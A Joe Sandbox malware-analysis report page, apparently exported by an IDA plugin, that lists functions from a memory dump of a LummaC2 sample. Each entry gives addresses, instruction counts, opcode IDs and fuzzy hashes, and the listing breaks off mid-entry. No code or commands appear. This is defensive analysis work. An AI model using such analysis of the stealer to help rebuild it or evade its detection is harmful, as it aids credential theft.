Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cc2a022f6c0fbd4c9934def9acc49904fe79d67e71e1d15b386ea3ee83ceb46
Instruction ID: 491f30228714bdb772c3ebb40b5f08a61d042cdd0984d3e16fcac750b7581c46
Opcode Fuzzy Hash: 2cc2a022f6c0fbd4c9934def9acc49904fe79d67e71e1d15b386ea3ee83ceb46
Instruction Fuzzy Hash: 72F1C532718211CFC718CF28D99066BB7E2EFCA314F1A89ADD88597391DB359D52CB81

Function 00A97790 Relevance: .5, Instructions: 506COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71a242f493a6410ebfa5e99367c6ebbb925e40c211037485071aa09ebb946ca2
Instruction ID: 09ed5a3fa93aa619702647f5dbaafdc5ab84d3d9ca5f23875840f8355ffa6768
Opcode Fuzzy Hash: 71a242f493a6410ebfa5e99367c6ebbb925e40c211037485071aa09ebb946ca2
Instruction Fuzzy Hash: 2DE12532B183118BDB14CF24C991A6FB7E2FBC5708F19892CE89597255DB35EC0AC7A1

Function 00A8D110 Relevance: .5, Instructions: 480COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 038c0d7e94ccd3593c938b4e350efbfdef5c2901c7f194a18273d23cc5775b15
Instruction ID: 3f56941a1dfe8f7751a82fa64ff513a81ac63561054900901be58e062c880dd1
Opcode Fuzzy Hash: 038c0d7e94ccd3593c938b4e350efbfdef5c2901c7f194a18273d23cc5775b15
Instruction Fuzzy Hash: DE22E3F0A11B019FC3A9CF29C845B97BBE9EB8A314F54491EE1AE87390C7716502CF95

Function 00A65970 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6aba2e7236a2e9aceeb2528f5b0b9aaecc5cc82245fb39869df27382fd64ba8a
Instruction ID: 3c28de79965e2318a02363e2ed61bcbaed4660c73f8d233353cbac24bcdf7a32
Opcode Fuzzy Hash: 6aba2e7236a2e9aceeb2528f5b0b9aaecc5cc82245fb39869df27382fd64ba8a
Instruction Fuzzy Hash: 21E16671608781CFC720DF69C880A6BBBF5AF99300F448D2DE4D987752E675E948CB92

Function 00A86230 Relevance: .4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3fe3b4dbac5bceb05aaa75f46aa8b386d178d3d64cd9d2ea891419b3ac705e5e
Instruction ID: 829f0677226006cf5d937f947a5a44d19fbe2e625ca6715268265268d1a87540
Opcode Fuzzy Hash: 3fe3b4dbac5bceb05aaa75f46aa8b386d178d3d64cd9d2ea891419b3ac705e5e
Instruction Fuzzy Hash: 2CB14B71A483114BEB18EF64D84267BB7E1EF95314F19893CE4869B382E735DC09C792

Function 00A81D10 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95a331fed96447ee307f2a06dec8c373b52d09d3014762f853c975be9edea67b
Instruction ID: 9cb304b4bd9da61d828a822e9889acdcd0c37bdce88105b69e2429e38a205e46
Opcode Fuzzy Hash: 95a331fed96447ee307f2a06dec8c373b52d09d3014762f853c975be9edea67b
Instruction Fuzzy Hash: 3FA1C571A043019BD724AF24C892B67B7B9EFC4368F18892CF9898B381E775DD06C756

Function 00A7D840 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cee6d8b1c79c27cd79d5fb12d96312c768aa81eb9b3bd2fea6af86f98214c114
Instruction ID: 0c9a32f3c22f8839d941167ebdb2d221f0d81c094ce3f43ab7930cd2b05dde2e
Opcode Fuzzy Hash: cee6d8b1c79c27cd79d5fb12d96312c768aa81eb9b3bd2fea6af86f98214c114
Instruction Fuzzy Hash: 88B1C275608302AFDB209F24CD41B2ABBE1AFD5354F15CA2CF4A8A72A1D7729D45CB42

Function 00A9E1F0 Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 07d6686e5724fa125fcab93db3953f0a640214825bf9c6136f9face212f706c8
Instruction ID: 48182086a7de0a56ca0577007c7f376b5a95efe8e350cc222689fa49db3a334f
Opcode Fuzzy Hash: 07d6686e5724fa125fcab93db3953f0a640214825bf9c6136f9face212f706c8
Instruction Fuzzy Hash: 1191C3757043119BCB24CF18D881A6BB3E2FFD8714F19892CE9959B352DB35AC51CB82

Function 00A8DFC3 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f787ea2e974248463b31dc723ea94e0fb55cd718f4d8d4659de032db6748c2e
Instruction ID: e272955b8ed0dcfa3d85a52fbbd77c895f37022e153bfd44c8459f7986e02955
Opcode Fuzzy Hash: 1f787ea2e974248463b31dc723ea94e0fb55cd718f4d8d4659de032db6748c2e
Instruction Fuzzy Hash: A5D1F272608B818BD319CA3C88953A7BFE25BD6314F18CA7DD4EB877C6D578A405C702

Function 00A9DEB0 Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7e79de674b2f39f47b4dd8aa39f9de893ffa7ddca5ec2933710c17b6654b6539
Instruction ID: e4a72870d62bc31e49ec3105b9cae50ce9c19d71f28000eeaf72872184752747
Opcode Fuzzy Hash: 7e79de674b2f39f47b4dd8aa39f9de893ffa7ddca5ec2933710c17b6654b6539
Instruction Fuzzy Hash: E091C1757042119BDB14DF18D991A7AB3E2FFD9710F15852CE8858B366EB30EC51CB82

Function 00A87A40 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62d3a2b7522c41ad1b385bd6e99220bb05ef6fd1ae8bed2c5843d69fdf965b75
Instruction ID: 00c2c2c221dd83aba9af5d90827e3eb39b0e04c711ee8cef6539f3e4619f535b
Opcode Fuzzy Hash: 62d3a2b7522c41ad1b385bd6e99220bb05ef6fd1ae8bed2c5843d69fdf965b75
Instruction Fuzzy Hash: 24B1E332E08642CFDB14CF78D8A076DB7B2AF8A364F2942A9D4515B3E1DB359D41CB40

Function 00A661D0 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5140ca86dd5b4bcaba2cb1346e0d6ff8cb35f9844ba483e5f1b1bd21b4eb7be
Instruction ID: c01e48db2bd11b6f696a3f0f91e39d46e999303341033080ca3d83ed5daf8893
Opcode Fuzzy Hash: b5140ca86dd5b4bcaba2cb1346e0d6ff8cb35f9844ba483e5f1b1bd21b4eb7be
Instruction Fuzzy Hash: 6AC16CB29487418FC360CF28DC96BABB7F1BF85318F08492DD1DAC6242E778A155CB46

Function 00A88C46 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b781e6b735e83c6866d1047aba1063f53379933819bca154b6a42e9625a98b6c
Instruction ID: f84bee9fb4b9b469de7bf542d7700a6a494ffc206f40d96d2f6637420743fcc9
Opcode Fuzzy Hash: b781e6b735e83c6866d1047aba1063f53379933819bca154b6a42e9625a98b6c
Instruction Fuzzy Hash: 3CA124B09083418FC714DF68C89265BBBF1EF96304F44892CF5958B392EB79D805CB96

Function 00A9DBB0 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4a4b02fbdbd179ec18d4a66e156487c11e5078a9f697a245adf6504fba65e547
Instruction ID: f2e475e76edf73af1eef9a5b9daf99dec03f32212ee268df0412d1858cb31e79
Opcode Fuzzy Hash: 4a4b02fbdbd179ec18d4a66e156487c11e5078a9f697a245adf6504fba65e547
Instruction Fuzzy Hash: BE813576B052159BCB25DF28C98067BB3E2EFD8750F19C52CE8859B294EB30AD51C781

Function 00A7D560 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f50e6e5f1e8772d265d3d92553ef9716323a43e355a27d57548e7de40aa2d9f6
Instruction ID: 316096e56636a3ebd310e50162f9d704a689fa3f526dbf32ab9a1c71e2c45a7f
Opcode Fuzzy Hash: f50e6e5f1e8772d265d3d92553ef9716323a43e355a27d57548e7de40aa2d9f6
Instruction Fuzzy Hash: A5912772A082614FCB298E288C5139E7BF1AF95324F19C63DE8B9973D1D7749C0697C1

Function 00A87D94 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57d0c2d0e2f9e9c45dc373489f20d59de148c3999a948f0c4ad3bf61658330e1
Instruction ID: c8d44a7e864292e02ce66fa89c3a6e5bd25978dd5d80eb0e26db43bc72822ce0
Opcode Fuzzy Hash: 57d0c2d0e2f9e9c45dc373489f20d59de148c3999a948f0c4ad3bf61658330e1
Instruction Fuzzy Hash: 2E9127B6E00205CFDB14DFA4D855BAEB7B1FF49314F19426CD5026B392DB79A806CB90

Function 00A974F0 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca2014fc0c9e28afef53dc52725b72d87901a992287adb27b6327cb373dae8f0
Instruction ID: 1efe3adc01bc225fc836212b103a208699da7e3dbda2deb941f636160bf29873
Opcode Fuzzy Hash: ca2014fc0c9e28afef53dc52725b72d87901a992287adb27b6327cb373dae8f0
Instruction Fuzzy Hash: 456156767182019BDB14DFA8DD85B6F73E2EBC0304F15882CE485C7290EB75D90687A2

Function 00A9A0D0 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 197e15dcedbef9622fd1988ba3a997dc87d9f3eff205842869fb11afba46d71c
Instruction ID: e206a0d2e1d4eb5825fc9f936fb26b804186678bd030189b60569a6934c99a7b
Opcode Fuzzy Hash: 197e15dcedbef9622fd1988ba3a997dc87d9f3eff205842869fb11afba46d71c
Instruction Fuzzy Hash: 2F5127757083048FEF249F65D85177B77E1EBA6700F29842DD58297392E632AC018BD2

Function 00A9A510 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f2de444c888cb97c703f3f568c299db3b1bc48a2c28558f2f2fe182fdb1eb0f
Instruction ID: 9ae2fd02a65c92a02711c351b194ee64db5e19dec705ed6ea5a6b0639d12c163
Opcode Fuzzy Hash: 7f2de444c888cb97c703f3f568c299db3b1bc48a2c28558f2f2fe182fdb1eb0f
Instruction Fuzzy Hash: BF511636B043108FDF20DF6898C16A7B7E2EBE6710F29852AC59197291E7759C06C7D2

Function 00A7DFC0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9515c23a66f00deea6c645064c9ebbcf396b15161566e32e836666e46e4a6cb8
Instruction ID: 2413efb002005c9a716f72343afd2d1a12fd77bf21dc8d24b93eb6b60d9d92a5
Opcode Fuzzy Hash: 9515c23a66f00deea6c645064c9ebbcf396b15161566e32e836666e46e4a6cb8
Instruction Fuzzy Hash: 8A610833789A814BD728D97C5C522A6B9934BDB230F2DC7BD96B58B3E1D9A54C064340

Function 00A9CBA6 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8c26f3fff34845aab3d4e65bf3dec4177bd9b02e559400375f30c4e1877a9d1
Instruction ID: e7dc936aa44b40ade052f68c394d5aee18cbf3d554ecf6c3f8ddea8450386b5c
Opcode Fuzzy Hash: d8c26f3fff34845aab3d4e65bf3dec4177bd9b02e559400375f30c4e1877a9d1
Instruction Fuzzy Hash: CF41D733B187514BD718CE3D889226BBBD29BDA620F1D9A3DC8D9D7381E939DC064781

Function 00A830E0 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2c433e65180835dfa0855fa98bdecae24ce134a993711c5e473737a74389efe
Instruction ID: 0fd75f20e1cdadc4dfcdc8fb2c315b57b7a2fd907e964e04088fd1fc537ee7ba
Opcode Fuzzy Hash: f2c433e65180835dfa0855fa98bdecae24ce134a993711c5e473737a74389efe
Instruction Fuzzy Hash: 3351A135A18202CFE728CF68D8513AAB7E2FBC9311F19857CE88597694DB75DC12CB80

Function 00A95FF0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
